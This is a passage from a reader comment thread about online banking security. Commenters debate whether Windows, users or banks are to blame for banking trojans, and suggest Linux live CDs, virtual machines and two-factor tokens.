    You can't ! Or you have a long uphill climb where the terrain changes as fast as the English weather.

    I think Linux fans need to shut up and read a book some times.

    That would help us non-penguin-blooded folks arrive at a solution without all the PROPAGANDA getting in the way.

    Don't get me wrong. I hope there is a Linux solution, but genuine penguin heads ain't got it.

    Thanks Mark.

    ALFAZED

  39. Neil Barnes
    Boffin

    The point was made both earlier and in the article

    Use a live-boot CD. (Or probably better and more convenient - though I don't know if such a thing exists - a live-boot USB *ROM*)

    That way, it doesn't matter what's polluting your computer; the main hard drive is never touched and you know that the same OS and code is running first time every time. There will never be an issue of downloaded viruses[1] - except in the original image, and that would be known about pretty quickly - since the only thing you would ever use this for would be to talk to your bank. No cookies either, come to think about it, beyond the session.

    At the moment, the only live CDs are (I think - I stand to be corrected) Linux variants, but that's neither here nor there; I'm sure if MS got together with the bank they could get a minimal OS approved by the banks and delivered on a read only medium. It doesn't need much more than a minimal screen driver and browser... hmm, something for Android?

    Yes, you would need to configure your internet every time you used it, but so what? How much is your bank account worth, vs a couple of minutes of your time?

    [1] I suppose there's a possibility that some bright spark might come up with a virus which can burrow into the bios eeproms of the various common motherboards and be capable of recognising a CD/USB boot as an interesting one to sniff at... but how much use is made of the bios once the boot has started?

  40. Jay Castle
    Grenade

    @ Big-nosed Pengie

    Crap analogy. A more accurate one would be:

    Motor Car X is the most popular car in the world, owned and used by 80% of the world's population. If anyone, anywhere is going to do some driving, the vast majority of them will use this car. It has reasonable security, if correctly administered by the driver, but will always be open to theft if the driver doesn't follow sensible precautions and lock the damn doors.

    Motor Car Y is another motor car, that some feel is just as good as X but is only used by a very small number of drivers for various marketing reasons, not the least of which is that it hasn't been around as long as X. The security on this car is comparable to that of X; however the drivers of Y tend, because of its nature as a smaller, less popular car, to be hobbyists or enthusiasts and spend more time fiddling with the system to make it work better. In addition, because of its niche market, thieves have found it more profitable to target X instead of Y.

    If you were to do a study on the number of thefts of property from Motor Car X or Motor Car Y, would you be at all surprised to learn that the majority of thefts occur from X, rather than Y?

    No, didn't think so.

  41. Joe 35
    Stop

    "but then I don't click on attachments "

    Doesn't matter. Visit a compromised website (which may be reputable, not just dodgy porn/warez) and you've been done. Just visit them as a Windows user and you've been infected. http://www.theregister.co.uk/2008/10/31/sinowal_trojan_heist/

    As for those who say that its all down to dominant market share, tosh and piffle. Do they think there is something magical about market share that makes it technically possible to break in once a system attains a high enough percentage? If *nix could be broken easily, it would have been done already, irrespective of market share.

    Mac users, with no virus protection, and presumably on average higher net worth as they can afford the Apple Tax, are already much more lucrative targets than Windows. Yet number of Mac viruses=zero, Mac trojans=2. That's not because no one can be bothered to attack the systems, it's because, so far, they have proven much more secure, by design.

  42. Daniel Wilkie
    Gates Horns

    @Big-nosed Pengie

    Not wanting to cause aggro, but perhaps in this case the example slightly misses the mark...

    A better example would be:

    Car X is poorly designed and constructed and fragile, but strangely popular. Many VIPs who use them get assassinated.

    Car Y is well designed and tough but very few people use it. An even smaller percentage of those get assassinated.

    You'd take Car Y of course. And then when everyone has Car Y, said assassins would just develop ways to destroy Car Y.

    OK, my analogy isn't perfect, but more accurate to the situation, don't you think? Your example implies that Windows crashes and then hacks all the banks and steals everyone's money (which it may well do tbh).

  43. raving angry loony

    fault?

    I see the Microsoft apologists are out in full force again.

    Here we have a company who is single-handedly responsible for the fact that users DO click on any and every attachment that comes their way, without providing any form of checking or security. Why? Because it was made ultra-convenient and for years was marketed as perfectly safe. This is a company that has, for 30 years, implemented a system that is completely insecure at its very core. A company that deliberately allowed user actions to affect core system resources without any form of restriction. A company that has continuously used its muscle not to push GOOD security, but to redefine what "good security" actually means. A company that does all sorts of security theatre, but continues to put out a product that can be so easily compromised.

    And it's not their fault? Pull the other one, it's got bells on.

    They've had a monopoly on the desktop for almost 30 years, since they (illegally) sold a product they did not yet own to the monopoly of the day. Instead of doing it right, they decided to do it any way that made the most profit - but certainly not the way that was best for consumers in the long run. This is just another example, and yes, lack of security and lack of protection for users IS their fault.

  44. Number6

    Users

    @Jacob Reid - It's not always the user at fault. If you've got a hacked website (where even the owner doesn't know it's been got at), and a zero-day exploit, then the user doesn't need to do anything different today than what he did yesterday to get his machine compromised. Of course, this can happen to Macs and Linux machines just as much as Windows, but there will be less useful results because there are fewer of those out there.

    @b166er - when using the drop-down box I do sweep the mouse off to the side just in case. However, I believe the common work-around for fraudsters is a screen grab that shows what you've selected in the boxes. Not so suitable for automated hacking because someone's got to interpret the image, but still valid.

  45. Tom 7

    It IS MS fault

    Why - cos they tell you computing is easy. They make a fortune out of selling something that is made easy for you to use. For easy read 'as secure as a fishnet condom'.

    Sure some people use 'easy' versions of Linux as root cos they think computers should be easy after MS told them it should be. Sheep! Living the MS lie.

    Computing with MS is like buying an electrically powered exercise bike. Might impress the neighbours but it's only going to cost you money and get you nowhere in the long run.

    You want secure computing? Don't expect to be able to buy it off the shelf. Don't expect it to be easy. Don't expect it to be MS.

  46. Daniel 1

    Oy! Troll-bait!

    All I'll add to the hopeless hubbub that this story will attract is that if you think "there's no way to know your Linux machine isn't compromised, either", then it's because you can't be arsed looking. Describe to me the circumstances under which a Linux owner would be unable to find out if there was something nasty lurking on their machine? You may think it bad, you may think it good, but the one thing you cannot argue about with Linux is that it gives you total control, if you can be bothered taking it.

  47. Jess

    Windows IS the problem, but not for the reasons most people seem to think.

    The problem is two fold.

    1. Abysmal out of the box configuration (which is significantly improved for the versions of windows that no-one wants for other reasons).

    Running with admin rights???

    2. Bundled Unsafe web and email programs.

    Any HTML based email system is far more vulnerable to phishing and trojans than a plain text system. It is easy to make an email look like a corporate one and embed links that go to somewhere other than they indicate. And if someone is expecting an email they may get caught out. (I very nearly did once, on a web based email system, I never use HTML normally).

    Internet Explorer is very vulnerable.

    I doubt any of those compromised were using firefox with noscripts and an email client set to only use plain text. (Or a firewall configured to achieve the same end result.)

    The blame is the way it is packaged. And for corporates the blame is for hiring people too stupid to understand this and re-do it properly. (if they *insist* on using windows).

    That is why I am disappointed Windows 7 still comes with IE.

  48. Estariel

    Vm?

    Anyone looked at using a dedicated VM guest for online banking, and doing all email, web surfing, risky activity in a different guest?

  49. Anonymous Coward
    Anonymous Coward

    Not this old chestnut

    "(And yes, as Apple's market share continues to rise, it's likely OS X will be targeted. We can cross that bridge when we get to it.)"

    AAAARRRGGHHHH.

    You've been saying this for 8 years. Market share is such a minor part of it - if OS X was so easy to crack, all it would take would be a trojan in an email attachment. Sure, fewer people would open it, but 35 million people is hardly not worth bothering with.

  50. alain williams Silver badge

    Not using MS Windows is good advice

    Look at the numbers: Linux users tend to not be prone to the problems that plague MS users.

    That is all that matters. Why is not important. Move to a Linux desktop and enjoy not having to always worry about infection.

    Many have said that when more desktops run Linux it will fall prey to malware. I agree that there will be more attempts; however the whole design is inherently more secure. But to you it should not matter - you should be concerned about your security today and the best way of achieving that is to move to a Linux desktop. What will happen in the future is another thing.

    Don't get me wrong: I do keep my machines patched & up to date, that is easy under Linux.

  51. Andus McCoatover
    Linux

    Cheques...

    "Contrary to what banks say, writing checks really isn't that much of a hassle, at least if you don't write that many of them."

    Yep but here in Finland, we stopped using them seriously - oh - 25 years ago. I've never had a cheque book in Finland. Never even been offered one - all payments I make are online, either from home, or from a bar-code reader in the bank's foyer (which I never use - costs €2/month for the service)

    When I got my pension cheques from the UK, I had to go through a lot of form-filling - in the main Oulu branch, 3 km from home - to cash a £100 cheque. Took the famous "10 wurkin daze" and cost me £25 for the privilege. Thank fuc*k the Equitable changed to Worldpay. Only £3 now...(Sigh)

    @big-nosed Pengie - were you referring to the Ford Pinto, as best satirised in the film "Top Secret"?

    Penguin icon, natch. I only use my mini-lappari (Asus 701/eeebuntu) for the bank. Plus my one-time pad access code, used with my memorised 7-digit customer number. Wanna see how it works? Try

    http://www1.nordea.fi/appx/solo/3/include/demo/pndemo/index.html and click the mouse icon.

    Not bad for a quid or so a month TOTAL bank charges...Now, that's real service.

  52. Mike007

    erm

    I think the problem is their security was based on a code from a hardware token - OK, so that stops someone else logging in to your account, but if they've infected your computer then it doesn't stop them adding an extra payment to the list of actions you're doing.

    Why not something similar to what my bank does? Instead of the hardware generating a token that can be used to do anything, make it generate a code that can only be used to verify that single transaction! If I want to send a payment to a new destination their website gives me a code, I type that into my reader, and it generates a code to verify *that action* and no other - the reader also has the ability to verify specific transactions (supplier, and value) although so far they only use it to verify adding a new account to receive payments (although if they mitm that, then they can easily change it without issuing new hardware).

  53. adnim

    @Anonymous Hero

    I knew the flame bait statement regarding Windows being fit for nothing but games and media would spark such a reaction. At least your tears will quench the flames ;-) However I withdraw that statement because with draconian DRM windows isn't fit for media either. However it is excellent at running Cubase as well as allowing criminals to earn a bob or two.

    Ooooo, wankers and penetration in the same sentence, I'm getting hot.

    Linux audio works fine although it would work even better if hardware manufacturers wrote Linux drivers or released sufficient documentation to allow OS developers to leverage the best from their kit.

    I have cause to be optimistic, if Windows was secure and Linux easier to get working with obscure hardware I would have likely been a bus driver or gigolo perhaps.

    /removes tongue from cheek

    I like ducks, have you seen the way water flows off their back?

  54. Edwin
    Thumb Down

    What utter tripe

    All of this malware relied on THREE points of failure:

    - An insecure windows install

    - An idiot user

    - Banks with weak authentication

    I've been using online banking, antivirus AND windows together for nearly 10 years, and the only place this seems to happen is the US with usernames and passwords for account holders.

    Dutch banks use two-factor authentication, and I have yet to hear of a real-life case where this was hacked, despite many scare stories from security twits.

    Dan - I'm disappointed.

  55. Anonymous Coward
    Linux

    Windows is NOT the problem. I am in security

    re: "i'd love to see... #"

    "...The state of a linux system administered by a guy who clicks random email attachment executables. No need for a trojan if you've got root...", David W.

    Can you demonstrate opening an attachment on a Linux system that executes malware, or a site that executes malware by clicking on a URL? Running as root is a non-issue as the system is still usable running as a standard user. In most systems it isn't possible to log in using the GUI as root.

    -------

    re: "Windows is NOT the problem. I am in security, I know", Mr. Barbour

    "The problem is not Windows, the problem is the end users"

    Is it possible to configure a Windows desktop that doesn't require the end user to have admin access?

    "I am an IT professional who specializes in security and viruses"

    Can you right now point me to a web site that I can get 'infected' by, by clicking on a URL, or a sample of an email attachment that does the same, by clicking on the attachment icon? No other action required.

    "education to users on how to avoid infecting their PCs or how to perform regular scans, keep the OS patched, patch all third party applications, replace end of life applications, and even upgrading to the newer versions of windows"

    Users can't be bothered to waste their valuable time doing all that. Besides they can avoid it by one of those bootable CDs.

    "I support thousands of end users everyday, and the biggest problem is them going to infected sites (drive-by malware attacks) and downloading files that are not legitimate"

    Do you charge money for this 'support' ?

    "I personally would rather stick with the company that has been in the game fighting this stuff from the beginning rather than switch to a company that doesn't even recommend trying to protect yourself and has no experience defending from these"

    I personally don't understand why I have to pay extra off the top, to get a working computer that doesn't get infected by malware.

    ps: Doing AV scans on someone's desktop is not being 'in security' ..

  56. Isolated Penguin

    A Timely Article

    I was just called up to the main office to find out why a user's Outlook was reporting errors. I found not an error, but 2 e-mail messages from "Support" claiming that their version of MS Outlook (she is running Thunderbird) was mis-configured and that they needed to run the attached install.zip file to correct it. Another virus, obviously. Had this user followed the instructions I am sure that part of my day tomorrow would be spent cleaning up the user's system.

    This is even more of a concern to me because here in Korea you can not do any on-line banking or anything else without using Internet Explorer and at least half a dozen ActiveX crypto, keyboard, screen, etc. plugins that may or may not actually protect the user. These plugins come from the institution, are installed in the background, and run without the user's knowledge or any user intervention; the site complains if the plugins are not in place.

    There was an article published in the Korea Times, one of the local English newspapers, about the dangers to Korea of the existing Microsoft mono-culture. http://www.koreatimes.co.kr/www/news/nation/2009/09/123_52401.html

    "...country's overreliance on the technology of Microsoft, the U.S. software giant that owns the Korean computing experience like a fat kid does a cookie jar."

    I wonder how many other Korean computers enlisted in the latest bot army today?

  57. Paul 4

    Cheques...

    "Contrary to what banks say, writing checks really isn't that much of a hassle, at least if you don't write that many of them."

    It's not about the writing, it's about the banks and the company you're sending them to having hassle, and it is basic politeness in modern accounts to use BACS or CHAPS if you can, so that other people will do that for you. It may seem like big numbers, but to most medium to large accounts departments £250k is not a huge sum compared to the cost of processing cheques.

    Cheques are a pain in the arse to process from an accounts receivable point of view.

  58. Isolated Penguin
    Linux

    For those of you who are blaming the users....

    Yes, user training is a problem especially with Windows based systems.

    But I find it interesting that when the Apple Mac had a much smaller share of the computing market, less than 2 percent, Mac OS up through OS9 had virus problems and virus scanners to deal with them. Since then Mac market share has grown significantly; some say 5% plus, others put it higher. Yet Mac OSX has not seen a corresponding rise in virus problems. In fact they have pretty much disappeared. And Mac users are also considered to be some of the most "trusting" of any computer users, but they don't have the same virus problems and fears that are just a part of the Microsoft computing experience for users at all levels of experience. They just get their work done.

    Then -- Less than 2% market share, Mac was worth attacking. Now -- More than 5% of a much larger computing market and no virus problems to speak of. Same Users. Even similar Intel based hardware. Hmmm could the OS architecture be a factor?

  59. Jeremy 8
    Coat

    Problem and solution...

    Problem: You want to use Linux or a live Linux CD but your bank only supports IE.

    Solution: Notify them of the problem. If they don't fix it, change banks.

  60. TrishaD

    @Adnim

    Congratulations - the first truly sensible post on this topic.

    It is of little value to castigate the end users, consider them 'unfit to use a PC', describe them as 'bozos' or whatever. The fact of the matter is that the internet in its current form only exists (and a large number of techies have jobs, including security pros like me) because the use of a PC to conduct business and pleasure is now a mass-market occupation and the mass users have the perfectly legitimate expectation of switching on their machines in the morning and just using them.

    Blaming 'the user' is futile and achieves nothing.

    So - is blaming the platform of any more value? I'm not a huge fan of Microsoft but after many years of indifference they appear to have finally started to get their act together, and it's self-evident to me that just as Sun Solaris boxes sitting on corporate networks were the prime target in the late '90s, Windows is the prime target now and for the same reason - it's the most widely used O/S and the focus of the bad guys' knowledge base.

    I think we need to come up with a new paradigm for end-user computing where the user doesn't buy a PC and a basic O/S complete with Admin access, but a pre-configured unit with everything locked down in advance. Back that up with recent proposals that ISPs take steps to isolate machines infected with botnet malware and we might start to get somewhere.

  61. This post has been deleted by its author

  62. Andy Watt
    Thumb Up

    Echo - windows legacy arch definitely a big problem here

    I'd go along with posts pointing out the structural flaws in the way windows is constructed -

    1. It's built to support a huge range of hardware: therefore the driver model is too open (and when MS attempts to close the model a bit, everybody moans about it and it slows machines to a crawl)

    2. As admitted by MS themselves, they never thought Windows would ever be connected to a world wide network of PCs - it simply wasn't secure from the ground up

    3. As mentioned above, the original single-user mode operation is still hamstringing attempts to squish security into the platform

    But in addition - and probably more importantly - the very fact that windows is /on/ 95% of the world's computers should be the very reason why those with a little knowledge shouldn't use windows for online banking. Those statistical reasons for making all the malware for windows (as well as the structural ones) mean we should keep schtum and do financially sensitive work in Linux, or OSX, or whatever - just not windows.

    So I think the thrust of the article is in fact totally correct, not "defeatist" or "negative". You can't argue with the plain truth that Windows has hundreds of thousands of pieces of malware trying to get in, and you need to be savvy enough to keep it clean (touch wood, I've never had any money stolen this way and I work on windows all the time).

    People aren't ever going to learn this habit (hell, most of them don't secure their wireless access points unless it's shipped to them that way), so the windows machine base will always be swarming with infection.

    Run away from the herd!

    Apart from anything, even when you DO know how fragile Windows is, who wants to spend all that damn TIME cleaning, disinfecting, updating, doing dull maintenance work when the PC is so bloody powerful it could do it all for you, and be more secure from the outset anyway?

    I've had enough of complex operating systems which are dragging around legacy issues - just got rid of my last Symbian handset, and - you guessed it - got an iPhone. Locked down, yes. Some things dumbed down to hell in comparison - yes. But solid, safe (so far) and I have some confidence in its long-term future.

    Good article, says I.

  63. Dom 3

    Free Clue Here.

    Stop blaming the users. Read the following, particularly any self-proclaimed experts. Some slides:

    http://www.cs.auckland.ac.nz/~pgut001/pubs/phishing.pdf

    http://www.cs.auckland.ac.nz/~pgut001/pubs/malware_biz.pdf

    A longer read:

    http://www.cs.auckland.ac.nz/~pgut001/pubs/usability.pdf

  64. Anonymous Coward
    Thumb Down

    I'd rather bank online than call the bank

    bank: "can I have your name, address, DOB, account details, last sexual experience, etc"

    me: "and who might you be?"

    bank: "someone with a fake name working in a call centre a thousand miles away from where you live, with no particular concern for your security or that of your bank, sir"

    *click*

  65. Anonymous Coward
    Troll

    Here's your car analogy.

    Car X is made of cardboard, sticky back plastic and bottle tops. There is a nice(ish) looking plastic body kit on top of that but it only gets updated once every 5 years or so, usually by working in some gimmick they stole off Car Z.

    Despite the flimsy lightweight nature of it, Car X requires a 6 litre engine in order to travel the same speed that Cars Y and Z can go using a 2 litre engine. In order to meet the needs of this 6 litre engine, a high capacity fuel tank must be added also. If the car hits any sort of obstacle it will disintegrate instantly.

    Car X is very uncomfortable when you first drive it. The air con, sun roof, windows, electric mirrors etc don't do anything until you find the right 3rd party software. And every piece of 3rd party software adds 3 seconds to the amount of time the engine needs to turn over when you first turn the key.

    You must install airbags yourself and check them EVERY DAY or you WILL die. Same goes for seat belts and head rests.

    If you drive Car X to the bank criminals will steal it and use it as their getaway car, because the doors are made of plastic and can simply be pulled off. Any valuables you leave in the boot will be going with the criminals, along with the 600 brochures and catalogues for miscellaneous junk that the car came pre-loaded with.

    Cars Y and Z are actually good.

    Which one do you want?

  66. Carter Cole
    Gates Halo

    everyone already saying it but i gotta chime in too

    Windows is not the issue, it's dumb ass users. Yes, trojans are nasty and they can even do tricky stuff like rewriting the banking webpage so you don't even see your funds are gone, but if you use even a little common sense you won't get infected. When I get a virus (usually because I was slumming it on the nastier parts of the internet looking for viruses) I wipe my computer. I don't log into online banking anywhere; I make sure that I trust that the machine is not compromised, and if I even start to suspect it I won't go to online banking. I mean it's like saying use Macs because they don't get viruses, well now they are, and while some other options may be less likely to get infected, if you are just safe in the first place you will never have an issue.

  67. Anonymous Coward
    Troll

    oh and i forgot to say

    Car X's chassis was originally designed to be used for a motorbike, until MONOCORP realised people wanted cars and they tacked 2 extra wheels on the side. They've never stopped building cars that way.

  68. Anomalous Cowherd Silver badge

    Call the bank? More secure? Nope.

    Phone banking? More secure? You've got to be kidding

    I opened a new bank account with the Halifax this morning. To set up phone security I was asked to choose a 6 digit numeric pin, and told I would be asked for two numbers.

    How many people would choose a date?

    How many of those dates would have 0, 1 or 2 as the first letter and 0 as the third letter?

    How likely is it that I'd be given three tries to get it right?

    Banks: Don't ask for 6 digit pins, or if you do don't prompt for just two digits.

  69. Anonymous Coward
    Anonymous Coward

    Downloading files in unix/linux

    I'm not sure that I buy that users are less likely to fall for trojan attacks in unix/linux based OSes because downloaded files can't be executed without additional steps after download. My reasoning is that if a user is prepared to run anything that they are told to by an email, they'll also be happy to fire off a chmod command (or however it's done through the GUI) which an email would presumably instruct them to do.

    Also, if Vista is anything to go by, users will probably be happy to stick in their root password at the drop of a hat, without asking why; in fact they'll probably sudo any useful commands so they don't even have to.

    This is clearly a user problem; until users are educated enough to not believe everything that their magic box tells them, it will continue to be a problem. Remember this: It's 60 years since the Orson Welles 'War of the Worlds' broadcast and many, many people still believe anything any form of technology tells them.

  70. Anonymous Coward
    FAIL

    Reading comprehension fail

    Y'all didn't read the guy's article, nor the comments, did you? What he suggested was a cheap, i.e. "free", way for a lay person to get himself a secure terminal by using a Linux live-cd. He pointed out the advantages of a live-cd such as the read-only nature of its boot drive. I reckon that if MS or Apple would sell you a live-cd he probably would have recommended that one, or at least mentioned it.

  71. Jimbob 3
    Boffin

    Virtual Machine all the way

    For the ultra security conscious:

    Set up a Virtual XP Machine (Virtual PC/VMWare Server) for the sole purpose of online banking. Don't use it for anything else whatsoever and you WILL be malware and trojan free.

    Although, if you know how to do the above you probably know how to browse safely already. Hmmm

  72. Jimbob 3
    Flame

    *POSTING?!?!?*

    Rely on cheques? HaHaHaHaHaHaAAAAAAAAAAAHHHH! I am still waiting for a cheque I posted to a bank to arrive. I posted it on the 25th September. 20 days so far and no sign of it getting there. That is a joke.

    Shall we regress back to the caves with thinking like that?

  73. jg007
    Jobs Halo

    2 points about mac / linux users and not just 1

    1, as said they have less market share

    2, rarely said but very important - AT THE MOMENT most mac / linux people are more knowledgeable and less likely to click things than windows users, as they have to be, or at least know somebody who is, to change in the first place

    I have always used windows and internet explorer and have used online banking from the start and have never been hacked; the only time I got even a minor virus issue was when I was being impatient trying to find something and downloaded from somewhere not very safe, and I immediately realised and then wiped the computer to make sure that I felt safe.

    Windows is not perfect but it is complicated and has a lot of legacy support, so mistakes will happen and things will have to be patched; this patch tuesday is a good thing and not bad, as at least it means that a whole load of issues have been patched.

    stupid or silly users will always manage to find ways to cause problems or get themselves hacked

  74. Anonymous Coward
    FAIL

    The problem is the user

    OK so let's say theoretically that users stopped using Windows machines for online banking. Well, seeing how Windows has the biggest market and it is a super high chance that the banks themselves are using Windows machines, then what say you? If the banks can seem to keep their Windows machines uninfected then so can the home user. If they bothered to try. OS is not the problem. Yes Windows may be full of holes and blah blah blah but all I'm saying is if the banks use Windows and money isn't being stolen then the home user should be able to as well.

  75. Joe Blogs

    LOL

    It's funny reading all these comments where people are blaming, the OS writers, the users or the banks. Maybe we should blame the people who write the malware?

    Just a thought...

    Have a nice day.

  76. elderlybloke
    Linux

    On Line Banking

    A co-operative bank I use, in addition to password, has a little gizmo that has a 6-digit number displayed that changes every minute.

    It seems to be a very good extra security to my Joe 6 Pack knowledge.

    I understand my OS is safer to use than another more popular one.
